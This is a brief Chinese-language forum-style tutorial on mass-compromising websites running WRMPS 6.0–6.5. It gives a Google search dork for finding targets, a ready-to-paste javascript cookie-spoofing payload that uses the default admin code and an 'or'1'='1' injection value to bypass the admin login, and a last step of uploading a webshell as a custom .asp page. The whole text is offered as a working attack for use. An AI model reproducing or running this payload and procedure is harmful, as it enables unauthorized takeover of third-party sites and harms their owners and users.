WRMPS6.0漏洞 批量拿shell

最近发现一个很老的漏洞，看到这里 小菜一定会问 既然是很老的漏洞，为什么还拿出来呢

是因为这个漏洞的利用率非常高，以至于现在都是 现在我就给大家介绍这个漏洞的利用方法

漏洞范围很广 WRMPS6.0 以上包括现在最新的6.5 后台没有开启认证码或者后台认证码为默认的WRMPS6

6.5以下版本通杀 包括6.5
 

打开谷歌 INURL：powered BY WRMPS
admin/Admin_login.asp  后台登入地址
COOKIE 欺骗代码：javascript:alert(document.cookie="Admin=ManageCode="+escape("WRMPS6")+"&Pass="+escape("Cnhonkerarmy")+"&Admin="+escape("admin'or'1'='1' or '1'='1")+";path=/;");   
输入后 我们会看到一个提示框 恭喜你 成功了
之后输入 admin/Admin_Manage.asp
我们便来到后台了
在后台 功能 我们可以添加自定义页面  把小马写上 地址XX.ASP